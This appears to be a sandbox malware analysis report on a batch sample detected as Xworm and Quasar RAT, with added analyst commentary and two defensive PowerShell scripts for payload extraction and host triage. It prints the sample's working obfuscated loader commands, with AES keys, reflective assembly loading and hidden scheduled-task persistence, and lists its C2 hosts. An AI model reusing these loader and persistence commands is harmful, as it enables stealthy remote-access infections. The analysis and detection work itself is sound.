C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_824_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_824.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_824.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_824.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_824.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_824.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_490_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_490.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_490.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_490.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_490.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_490.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
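The three -ep bypass command lines above (Double.bat, startup_str_824.bat, XClientNOT.bat; the same loader also runs in the behavioral1 and behavioral3 detonations) are one stub: the script reads its own .bat file, takes the first line beginning with ":: " (a batch comment, so cmd.exe never sees it), splits the remainder on "\" into base64 blobs, base64-decodes each, AES-CBC/PKCS7-decrypts it with a hard-coded key and IV, GZip-decompresses it and hands the result to Assembly.Load, invoking the entry point. The only obfuscation is string reversal: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' is Load and 'txeTllAdaeR' is ReadAllText. The extractor below is an added example, not code from the report or the sample: it repeats the decode, decrypt and decompress steps and writes the resulting assemblies to disk instead of executing them. Defaults are the Double.bat key and IV shown in the report; XClientNOT.bat uses the second pair shown in its command line. The output path is an assumption. Run it only in an isolated analysis VM, with the sample on disk.

```powershell
# Added example: static payload extractor for the ':: ' stub loader seen in this report.
# Mirrors decrypt_function/decompress_function from the sandboxed command line but
# never calls Assembly.Load. Key/IV defaults are the Double.bat pair from the report.

function ConvertFrom-StubBlob {
    param([byte[]]$Cipher, [byte[]]$Key, [byte[]]$IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec   = $aes.CreateDecryptor()
        $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length)
        $dec.Dispose()
    } finally { $aes.Dispose() }
    # The plaintext is a GZip stream wrapping the raw PE image.
    $inStream  = New-Object System.IO.MemoryStream(,$plain)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $gzip.CopyTo($outStream)
    $gzip.Dispose(); $inStream.Dispose()
    $bytes = $outStream.ToArray()
    $outStream.Dispose()
    return ,$bytes
}

function Get-StubPayload {
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [string]$KeyB64 = 'WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44=',   # 32 bytes -> AES-256
        [string]$IvB64  = '4bA2EKopXpAd9WyBAjAcwg=='                        # 16 bytes
    )
    # The loader uses the first line that starts with ':: ' and splits the rest on '\',
    # one base64 blob per embedded payload.
    $stub = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $stub) { throw "No ':: ' payload line found in $BatPath" }
    $key = [Convert]::FromBase64String($KeyB64)
    $iv  = [Convert]::FromBase64String($IvB64)
    $index = 0
    foreach ($b64 in $stub.Substring(3).Split('\')) {
        $bytes = ConvertFrom-StubBlob -Cipher ([Convert]::FromBase64String($b64)) -Key $key -IV $iv
        $sha = [System.Security.Cryptography.SHA256]::Create()
        [pscustomobject]@{
            Index  = $index
            Length = $bytes.Length
            IsPE   = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # 'MZ' header
            SHA256 = ([BitConverter]::ToString($sha.ComputeHash($bytes)) -replace '-', '').ToLower()
            Bytes  = $bytes
        }
        $sha.Dispose()
        $index++
    }
}

# Usage (assumed path): dump each payload next to the sample and print a summary.
$sample = 'C:\analysis\Double.bat'
Get-StubPayload -BatPath $sample | ForEach-Object {
    $dest = "$sample.payload$($_.Index).bin"
    [System.IO.File]::WriteAllBytes($dest, $_.Bytes)
    $_ | Select-Object Index, Length, IsPE, SHA256
}
```

Both dumped files should start with MZ: the loader invokes payload 1 with no arguments and payload 2 with an empty string[], so each is a managed assembly with a static entry point and the next step is a .NET decompiler, not another detonation. Because the Files section shows startup_str_824.bat with the same SHA256 as Double.bat, the same key and IV decode the persisted copy; XClientNOT.bat carries its own stub and needs the key and IV from its own command line.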

Network

Country Destination Domain Proto
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3pqlkgi.ijq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4116-8-0x0000020D78F20000-0x0000020D78F42000-memory.dmp

memory/4116-9-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4116-10-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-11-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-12-0x0000020D79190000-0x0000020D791A0000-memory.dmp

memory/4116-13-0x0000020D78F10000-0x0000020D78F18000-memory.dmp

memory/4116-14-0x0000020D793A0000-0x0000020D794E0000-memory.dmp

memory/4408-16-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4408-17-0x000001CD51E50000-0x000001CD51E60000-memory.dmp

memory/4408-26-0x000001CD51E50000-0x000001CD51E60000-memory.dmp

memory/4408-29-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb15ee5741b379245ca8549cb0d4ecf8
SHA1 3555273945abda3402674aea7a4bff65eb71a783
SHA256 b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

C:\Users\Admin\AppData\Roaming\startup_str_824.vbs

MD5 3ffd611ef2d18d243ac564e0f7d62821
SHA1 dc263be524db27643cd508db6324a6fa84894ac7
SHA256 b3675ddb7a8616d21671bc2e69dac84890c104c802ba9132a89e0a523a8f1fae
SHA512 9ea8f1655bc51637279d62b86c0b863d233eb187a28fd1130736fe769327bbb51645046385c7fdc850954b5497f25e1794e947be2fc30464fb8307d579f60dce

C:\Users\Admin\AppData\Roaming\startup_str_824.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

memory/3932-38-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-39-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-50-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/4116-49-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-54-0x000001CE33570000-0x000001CE33894000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

memory/4116-57-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-58-0x000001CE33AB0000-0x000001CE33B00000-memory.dmp

memory/3932-59-0x000001CE33BC0000-0x000001CE33C72000-memory.dmp

memory/3932-60-0x000001CE349B0000-0x000001CE34B72000-memory.dmp

memory/3728-61-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3728-63-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-62-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-72-0x0000017A181C0000-0x0000017A181D0000-memory.dmp

memory/3728-73-0x0000017A322A0000-0x0000017A322A8000-memory.dmp

memory/3728-74-0x0000017A32540000-0x0000017A3254C000-memory.dmp

memory/236-84-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/236-85-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-86-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-87-0x000001853E1C0000-0x000001853E1D0000-memory.dmp

memory/236-88-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\startup_str_490.vbs

MD5 73e3c7287bdc5f01d99975b430648c50
SHA1 cc5c980a06300d17deb79d2ba171901fe572d19d
SHA256 90d9885fc42a71dd01bb1075c27c17440fd7c5477be9bcf0fdb11ab31b0129cc
SHA512 12f93c750af16e139b82dfa4a8026f51b79686e8c96a32df84e73f0db9184a88fdf4d6f278d79e055c05ba9e804b96a44bae28c9072ccf034d9f7be05f40a4c8

memory/4120-95-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4120-96-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-105-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-107-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-108-0x0000023DE8050000-0x0000023DE805E000-memory.dmp

memory/3728-109-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-110-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/3932-111-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-112-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/3932-113-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp

memory/4120-114-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp

memory/4120-115-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp

memory/4120-116-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
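The persistence in this detonation is a scheduled task named RuntimeBroker_startup_<n>_str (a legitimate Windows process name with a random suffix), triggered at logon with RunLevel Highest, hidden and with no execution time limit, whose action runs %APPDATA%\startup_str_<n>.vbs; the VBS starts cmd.exe on startup_str_<n>.bat, which is a byte-identical copy of the sample, and the loader runs again. The numeric suffix differs per run (824 and 490 here, 306 in behavioral1), so the exact name is a poor indicator; the combination of properties is not. The triage script below is an added example, not part of the report, written for a Windows 10 host with the built-in ScheduledTasks and DnsClient modules. The list of script extensions is an assumption; the task shape, file names and the *.gl.at.ply.gg tunnel hostnames come from the report.

```powershell
# Added example: host triage for the persistence and C2 artefacts in this report.

function Find-LogonScriptTasks {
    # Tasks that fire at logon and run a script out of a user profile, reported with the
    # RunLevel/Hidden/ExecutionTimeLimit values Register-ScheduledTask was called with.
    param([string[]]$ScriptExt = @('.vbs', '.bat', '.cmd', '.js', '.ps1'))   # assumption
    foreach ($task in Get-ScheduledTask) {
        $atLogon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }).Count -gt 0
        if (-not $atLogon) { continue }
        foreach ($action in $task.Actions) {
            $exe = [string]$action.Execute          # empty for COM-handler actions
            if (-not $exe) { continue }
            $ext = ([regex]::Match($exe.Trim('"'), '\.[a-z0-9]+$', 'IgnoreCase')).Value.ToLower()
            if (($ScriptExt -contains $ext) -and ($exe -match '\\Users\\[^\\]+\\AppData\\')) {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    Execute   = $exe
                    RunLevel  = $task.Principal.RunLevel
                    Hidden    = $task.Settings.Hidden
                    TimeLimit = $task.Settings.ExecutionTimeLimit
                    Author    = $task.Author
                }
            }
        }
    }
}

function Find-StartupStubFiles {
    # The sample drops startup_str_<n>.vbs plus a copy of itself as startup_str_<n>.bat
    # into %APPDATA%. Hash the .bat (it matched the sample's SHA256 in this report) and
    # check it for the ':: <base64>' payload line the loader reads.
    param([string]$Root = $env:APPDATA)
    Get-ChildItem -LiteralPath $Root -Filter 'startup_str_*' -File -ErrorAction SilentlyContinue | ForEach-Object {
        $hasStub = $false
        if ($_.Extension -ieq '.bat') {
            $hasStub = [bool](Select-String -LiteralPath $_.FullName -Pattern '^:: [A-Za-z0-9+/=]{64,}' -Quiet)
        }
        [pscustomobject]@{
            Path     = $_.FullName
            Size     = $_.Length
            StubLine = $hasStub
            SHA256   = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash.ToLower()
        }
    }
}

function Find-TunnelDnsEntries {
    # Both C2 endpoints in the Network section are *.gl.at.ply.gg names (playit.gg
    # tunnels), so the operator's real host is hidden; the suffix is still cacheable.
    param([string[]]$Suffixes = @('.ply.gg'))
    Get-DnsClientCache | Where-Object {
        $entry = $_.Entry
        @($Suffixes | Where-Object { $entry -like "*$_" }).Count -gt 0
    } | Select-Object Entry, RecordType, Data, TimeToLive
}

# Usage
Find-LogonScriptTasks | Format-Table -AutoSize
Find-StartupStubFiles | Format-Table -AutoSize
Find-TunnelDnsEntries | Format-Table -AutoSize
```

A hit from Find-StartupStubFiles whose SHA256 equals 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f is this exact sample; a .bat with a stub line but a different hash is the same loader with a rebuilt payload and should be fed to the extractor rather than dismissed. The DNS check only sees names still in the resolver cache, so on a host that has been up for a while pair it with proxy or DNS server logs for the ply.gg suffix and for api.telegram.org from a non-browser process.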

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 17:59

Reported

2024-04-13 18:01

Platform

win10-20240404-en

Max time kernel

38s

Max time network

52s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
